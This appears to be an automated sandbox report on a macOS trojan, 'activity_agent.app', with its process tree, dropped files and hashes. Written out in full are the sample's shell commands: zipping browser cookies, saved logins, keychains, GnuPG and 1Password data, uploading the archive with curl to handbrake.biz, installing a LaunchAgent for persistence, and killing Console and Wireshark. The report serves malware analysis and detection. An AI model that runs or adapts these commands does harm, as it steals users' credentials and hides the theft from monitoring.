Source: /bin/sh (PID: 643)Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 644)Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 646)Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 647)Shell process: sed s/^Path=//
Source: /bin/sh (PID: 649)Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 650)Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 652)Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 653)Shell process: sed s/^Path=//
Source: /bin/sh (PID: 654)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/FF.zip /Users/vreni/Library/Application Support/Firefox//cookies.sqlite /Users/vreni/Library/Application Support/Firefox//formhistory.sqlite /Users/vreni/Library/Application Support/Firefox//logins.json /Users/vreni/Library/Application Support/Firefox//logins.json
Source: /bin/sh (PID: 655)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/SF.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/Form Values
Source: /bin/sh (PID: 656)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/OP.zip /Users/vreni/Library/Application Support/com.operasoftware.Opera/Login Data /Users/vreni/Library/Application Support/com.operasoftware.Opera/Cookies /Users/vreni/Library/Application Support/com.operasoftware.Opera/Web Data
Source: /bin/sh (PID: 657)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/GNU_PW.zip /Users/vreni/.gnupg /Users/vreni/Library/Application Support/1Password 4 /Users/vreni/Library/Application Support/1Password 3.9
Source: /bin/sh (PID: 658)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/proton.zip /Users/vreni/Library/VideoFrameworks
Source: /bin/sh (PID: 659)Shell process: killall Console
Source: /bin/sh (PID: 660)Shell process: killall Wireshark
Source: /bin/sh (PID: 661)Shell process: rm -rf grace_period
Source: /bin/sh (PID: 663)Shell process: cp -R /Users/vreni/Desktop/unpack/activity_agent.app /Users/vreni/Library/RenderFiles/activity_agent.app
Source: /bin/sh (PID: 664)Shell process: mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /bin/sh (PID: 665)Shell process: mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/Info_.plist /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist
Source: /bin/sh (PID: 666)Shell process: mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/fr.handbrake.activity_agent.plist /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 669)Shell process: curl -s -F full_name=vreni -F username=vreni -F password= -F root_password=failure -F serial=C07N355HDWYL -F hostname=vreni%E2%80%99s Mac mini -F signed=0 -F file=@/Users/vreni/Library/VideoFrameworks/proton.zip -F api_key=9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57ea -F cts=1494347197 -F signature=77aa1c7aafbc61542eb30c0f1a1cb7f29c68adcaf5dbaa73561688d648c4f7b6 https://handbrake.biz/api/init
Source: /bin/sh (PID: 670)Shell process: touch /Users/vreni/Library/VideoFrameworks/.ptrun
Source: /bin/sh (PID: 673)Shell process: sed -i -e s/P_MBN/fr.handbrake.activity_agent/g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 674)Shell process: sed -i -e s=P_UPTH=/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent=g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 675)Shell process: chmod 644 /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 676)Shell process: codesign --remove-signature /Users/vreni/Library/RenderFiles/activity_agent.app
Source: /bin/sh (PID: 678)Shell process: rm -rf /Users/vreni/Library/RenderFiles/activity_agent.app/Ic*
Source: /bin/sh (PID: 679)Shell process: launchctl load /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 680)Shell process: killall Console
Source: /bin/sh (PID: 681)Shell process: killall Wireshark
Source: /bin/sh (PID: 682)Shell process: rm -rf /Users/vreni/Desktop/unpack/activity_agent.app
Reads local browser cookiesShow sources
Source: /usr/bin/zip (PID: 655)Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies
Source: /usr/bin/zip (PID: 655)Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies
Terminates several processes with shell command 'killall'Show sources
Source: /bin/sh (PID: 659)Killall command executed: killall Console
Source: /bin/sh (PID: 660)Killall command executed: killall Wireshark
Source: /bin/sh (PID: 680)Killall command executed: killall Console
Source: /bin/sh (PID: 681)Killall command executed: killall Wireshark
Writes Mach-O files to unusual directoriesShow sources
Source: /bin/cp (PID: 663)64-bit Mach-O written to unusual path: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/libexec/DeveloperTools/codesign_allocate (PID: 677)64-bit Mach-O written to unusual path: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp

Hooking and other Techniques for Hiding and Protection:

barindex
Denies being traced/debugged (via ptrace PT_DENY_ATTACH)Show sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)PTRACE system call (PT_DENY_ATTACH): PID 579 denies future traces
Explicitly terminates console (used for log message viewing) processesShow sources
Source: /bin/sh (PID: 659)Kills 'Console' processes: killall Console
Source: /bin/sh (PID: 680)Kills 'Console' processes: killall Console
Explicitly terminates network capturing processesShow sources
Source: /bin/sh (PID: 660)Kills 'Wireshark' processes: killall Wireshark
Source: /bin/sh (PID: 681)Kills 'Wireshark' processes: killall Wireshark
Moves itself during installation or deletes itself after installationShow sources
Source: /usr/bin/zip (PID: 627)File deleted: /Users/vreni/Library/VideoFrameworks/KC.zip
Source: /usr/bin/zip (PID: 627)File moved: /Users/vreni/Library/VideoFrameworks/zihaRvzn -> /Users/vreni/Library/VideoFrameworks/KC.zip
Source: /usr/bin/zip (PID: 655)File deleted: /Users/vreni/Library/VideoFrameworks/SF.zip
Source: /usr/bin/zip (PID: 655)File moved: /Users/vreni/Library/VideoFrameworks/ziSznLAI -> /Users/vreni/Library/VideoFrameworks/SF.zip
Source: /usr/bin/zip (PID: 658)File deleted: /Users/vreni/Library/VideoFrameworks/proton.zip
Source: /usr/bin/zip (PID: 658)File moved: /Users/vreni/Library/VideoFrameworks/ziHyh3w6 -> /Users/vreni/Library/VideoFrameworks/proton.zip
Source: /bin/mv (PID: 664)File moved: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent -> /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/bin/codesign (PID: 676)File moved: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp -> /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent

HIPS / PFW / Operating System Protection Evasion:

barindex
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: kern.safeboot (1.66)
Executes the "codesign" command used to create and manipulate code signaturesShow sources
Source: /bin/sh (PID: 676)Codesign executable: /usr/bin/codesign -> codesign --remove-signature /Users/vreni/Library/RenderFiles/activity_agent.app

Language, Device and Operating System Detection:

barindex
Reads the system or server version plist fileShow sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Reads hardware related sysctl valuesShow sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: hw.ncpu (6.3)
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: hw.cpu_freq (6.15)
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: hw.availcpu (6.25)
Reads the kernel OS version valueShow sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: kern.osversion (1.65)
Reads the systems OS release and/or typeShow sources
Source: /usr/bin/curl (PID: 586)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 597)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 669)Sysctl requested: kern.osrelease (1.2)
Reads the systems hostnameShow sources
Source: /bin/sh (PID: 580)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 582)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 584)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 588)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 589)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 589)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 590)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 592)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 594)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 595)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 598)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 599)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 603)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 605)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 608)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 610)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 612)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 614)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 616)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 618)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 620)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 622)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 624)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 631)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 637)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 643)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 649)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 662)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 667)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 670)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 671)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 672)Sysctl requested: kern.hostname (1.10)

Stealing of Sensitive Information:

barindex
May steal keychain information which contains credentialsShow sources
Source: /usr/bin/zip (PID: 627)Keychain directory enumerated: /Users/vreni/Library/Keychains
Source: /usr/bin/zip (PID: 627)Keychain directory enumerated: /Library/Keychains


Runtime Messages

Command:open
Exitcode:0
Killed:False
Standard Output:
Standard Error:

Yara Overview

No Yara matches

Screenshot

cam-macmac-stand

Startup

  • system is mac1
  • xpcproxy (PID: 579 PPID: 1 MD5: d68b4c6f2056c73e1d3bd228bcd6d4ff)
  • activity_agent (PID: 579 PPID: 1 Overlayed Process Image: xpcproxy MD5: 6a2d0c8b20efc3fa283176a4bc76d6fd)
    • sh (PID: 580 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 581 PPID: 580 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • openssl (PID: 581 PPID: 580 Overlayed Process Image: sh MD5: 1689d18d1f1b7b07480d337cc7fc9f43)
    • sh (PID: 582 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 583 PPID: 582 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • nc (PID: 583 PPID: 582 Overlayed Process Image: sh MD5: 2cbc307230ad7cd8050109ea4f2bd078)
    • sh (PID: 584 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 585 PPID: 584 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 586 PPID: 585 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • curl (PID: 586 PPID: 585 Overlayed Process Image: sh MD5: 313ae871e04221163541c8af134351dc)
    • sh (PID: 588 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • sh (PID: 589 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • sudo (PID: 589 PPID: 579 Overlayed Process Image: sh MD5: 7d986f7707c0f11264989cd7105ea80d)
    • sh (PID: 590 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 591 PPID: 590 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 592 PPID: 590 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sudo (PID: 592 PPID: 590 Overlayed Process Image: sh MD5: 7d986f7707c0f11264989cd7105ea80d)
        • sudo (PID: 593 PPID: 592 MD5: 7d986f7707c0f11264989cd7105ea80d)
        • echo (PID: 593 PPID: 592 Overlayed Process Image: sudo MD5: 28aaba1826ce568b1eec9cf71ad0655c)
    • sh (PID: 594 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • sh (PID: 595 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 596 PPID: 595 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 597 PPID: 596 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • curl (PID: 597 PPID: 596 Overlayed Process Image: sh MD5: 313ae871e04221163541c8af134351dc)
    • sh (PID: 598 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • openssl (PID: 598 PPID: 579 Overlayed Process Image: sh MD5: 1689d18d1f1b7b07480d337cc7fc9f43)
    • sh (PID: 599 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 600 PPID: 599 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 600 PPID: 599 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 603 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 604 PPID: 603 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 604 PPID: 603 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 605 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 606 PPID: 605 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 606 PPID: 605 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 608 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 609 PPID: 608 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 609 PPID: 608 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 610 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 611 PPID: 610 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 611 PPID: 610 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 612 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 613 PPID: 612 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 613 PPID: 612 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 614 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 615 PPID: 614 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 615 PPID: 614 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 616 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 617 PPID: 616 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 617 PPID: 616 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 618 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 619 PPID: 618 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 619 PPID: 618 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 620 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 621 PPID: 620 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 621 PPID: 620 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 622 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 623 PPID: 622 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 623 PPID: 622 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 624 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 625 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • mkdir (PID: 625 PPID: 624 Overlayed Process Image: sh MD5: 00efa095a9110a312bf9115afb361764)
      • sh (PID: 626 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • chmod (PID: 626 PPID: 624 Overlayed Process Image: sh MD5: ecb64579c6dd0ebee31bf8e4d4cdcc6e)
      • sh (PID: 627 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 627 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 628 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 628 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 629 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 629 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 630 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 631 PPID: 630 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 631 PPID: 630 Overlayed Process Image: sh MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sh (PID: 632 PPID: 631 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • grep (PID: 632 PPID: 631 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
          • sh (PID: 633 PPID: 631 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sh (PID: 634 PPID: 633 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • grep (PID: 634 PPID: 633 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
            • sh (PID: 635 PPID: 633 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sed (PID: 635 PPID: 633 Overlayed Process Image: sh MD5: 824cf059686109372fe70bf8d9c320dd)
      • sh (PID: 636 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 637 PPID: 636 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 637 PPID: 636 Overlayed Process Image: sh MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sh (PID: 638 PPID: 637 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • grep (PID: 638 PPID: 637 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
          • sh (PID: 639 PPID: 637 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sh (PID: 640 PPID: 639 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • grep (PID: 640 PPID: 639 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
            • sh (PID: 641 PPID: 639 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sed (PID: 641 PPID: 639 Overlayed Process Image: sh MD5: 824cf059686109372fe70bf8d9c320dd)
      • sh (PID: 642 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 643 PPID: 642 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 643 PPID: 642 Overlayed Process Image: sh MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sh (PID: 644 PPID: 643 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • grep (PID: 644 PPID: 643 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
          • sh (PID: 645 PPID: 643 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sh (PID: 646 PPID: 645 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • grep (PID: 646 PPID: 645 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
            • sh (PID: 647 PPID: 645 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sed (PID: 647 PPID: 645 Overlayed Process Image: sh MD5: 824cf059686109372fe70bf8d9c320dd)
      • sh (PID: 648 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 649 PPID: 648 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 649 PPID: 648 Overlayed Process Image: sh MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sh (PID: 650 PPID: 649 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • grep (PID: 650 PPID: 649 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
          • sh (PID: 651 PPID: 649 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sh (PID: 652 PPID: 651 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • grep (PID: 652 PPID: 651 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
            • sh (PID: 653 PPID: 651 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sed (PID: 653 PPID: 651 Overlayed Process Image: sh MD5: 824cf059686109372fe70bf8d9c320dd)
      • sh (PID: 654 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 654 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 655 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 655 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 656 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 656 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 657 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 657 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 658 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 658 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 659 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • killall (PID: 659 PPID: 624 Overlayed Process Image: sh MD5: e27cce82be3cba31a2486d00964d1c5e)
      • sh (PID: 660 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • killall (PID: 660 PPID: 624 Overlayed Process Image: sh MD5: e27cce82be3cba31a2486d00964d1c5e)
      • sh (PID: 661 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • rm (PID: 661 PPID: 624 Overlayed Process Image: sh MD5: e8926d2347850b76f57a1d5f0226de8b)
    • sh (PID: 662 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 663 PPID: 662 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • cp (PID: 663 PPID: 662 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)
      • sh (PID: 664 PPID: 662 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • mv (PID: 664 PPID: 662 Overlayed Process Image: sh MD5: 7fb694b9a3c7fd27aa7fca81d5afdfeb)
      • sh (PID: 665 PPID: 662 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • mv (PID: 665 PPID: 662 Overlayed Process Image: sh MD5: 7fb694b9a3c7fd27aa7fca81d5afdfeb)
      • sh (PID: 666 PPID: 662 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • mv (PID: 666 PPID: 662 Overlayed Process Image: sh MD5: 7fb694b9a3c7fd27aa7fca81d5afdfeb)
    • sh (PID: 667 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 668 PPID: 667 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 669 PPID: 668 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • curl (PID: 669 PPID: 668 Overlayed Process Image: sh MD5: 313ae871e04221163541c8af134351dc)
    • sh (PID: 670 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • touch (PID: 670 PPID: 579 Overlayed Process Image: sh MD5: 6e95af6ebd7fd2dd9a0e26654024db31)
    • sh (PID: 671 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • sh (PID: 672 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 673 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sed (PID: 673 PPID: 672 Overlayed Process Image: sh MD5: 824cf059686109372fe70bf8d9c320dd)
      • sh (PID: 674 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sed (PID: 674 PPID: 672 Overlayed Process Image: sh MD5: 824cf059686109372fe70bf8d9c320dd)
      • sh (PID: 675 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • chmod (PID: 675 PPID: 672 Overlayed Process Image: sh MD5: ecb64579c6dd0ebee31bf8e4d4cdcc6e)
      • sh (PID: 676 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • codesign (PID: 676 PPID: 672 Overlayed Process Image: sh MD5: 08b2dc5c47c8081db031055901b32ccd)
        • codesign (PID: 677 PPID: 676 MD5: 08b2dc5c47c8081db031055901b32ccd)
        • codesign_allocate (PID: 677 PPID: 676 Overlayed Process Image: codesign MD5: c04b0c53dc3af4effd0731b9663a555d)
        • codesign_allocate (PID: 677 PPID: 676 Overlayed Process Image: codesign_allocate MD5: f0209b39eba8aa88c1e94bb653698641)
      • sh (PID: 678 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • rm (PID: 678 PPID: 672 Overlayed Process Image: sh MD5: e8926d2347850b76f57a1d5f0226de8b)
      • sh (PID: 679 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • launchctl (PID: 679 PPID: 672 Overlayed Process Image: sh MD5: dbfeff92b30d89c0a04dd0fbeb40ae5e)
      • sh (PID: 680 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • killall (PID: 680 PPID: 672 Overlayed Process Image: sh MD5: e27cce82be3cba31a2486d00964d1c5e)
      • sh (PID: 681 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • killall (PID: 681 PPID: 672 Overlayed Process Image: sh MD5: e27cce82be3cba31a2486d00964d1c5e)
      • sh (PID: 682 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • rm (PID: 682 PPID: 672 Overlayed Process Image: sh MD5: e8926d2347850b76f57a1d5f0226de8b)
  • cleanup

Created / dropped Files

File PathType and HashesMalicious
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist
  • Type: XML document text
  • MD5: 873D9DE673F3BA08ED3C11EF0A114215
  • SHA: 38B537AC3FFDBE2F2795D88F3F3F90ED35B1C9D8
  • SHA-256: 0848E7B10C24B1D21372A34C87F700D9D3A433F6D7BE183411C85728A44EBD55
  • SHA-512: 6DB05EDC7B8DE5D1E4CFAB5C3B5BAFC6C769AADE8CB0618239094E2B9124F20D6F9DBC16BEAFFE140BE1D50EE5D23252F874EC0FCC271215FE25ADE5E31D82BD
true
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
  • Type: Mach-O 64-bit executable
  • MD5: 6A2D0C8B20EFC3FA283176A4BC76D6FD
  • SHA: A1D23706522FCC5BE456E45A9A64EF6D1275CEA1
  • SHA-256: BEC7BFC5375DD1C4BAC23121C8D83B80F484CD53261F0D3F9F3F64177E4B7CAF
  • SHA-512: 188512095A6F1CA83870CF28B22EA30070B502CA77647B7CDFD53F533B722E53EE2413197998D15F28F3FE5AF1C84619A5FDD486583E008F7325EA880E985FA5
true
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp
  • Type: Mach-O 64-bit executable
  • MD5: 9B653052733E371100FA1D00C0643051
  • SHA: 6FB1AF88615B9E72F6E9F2D92D59F76484A16A82
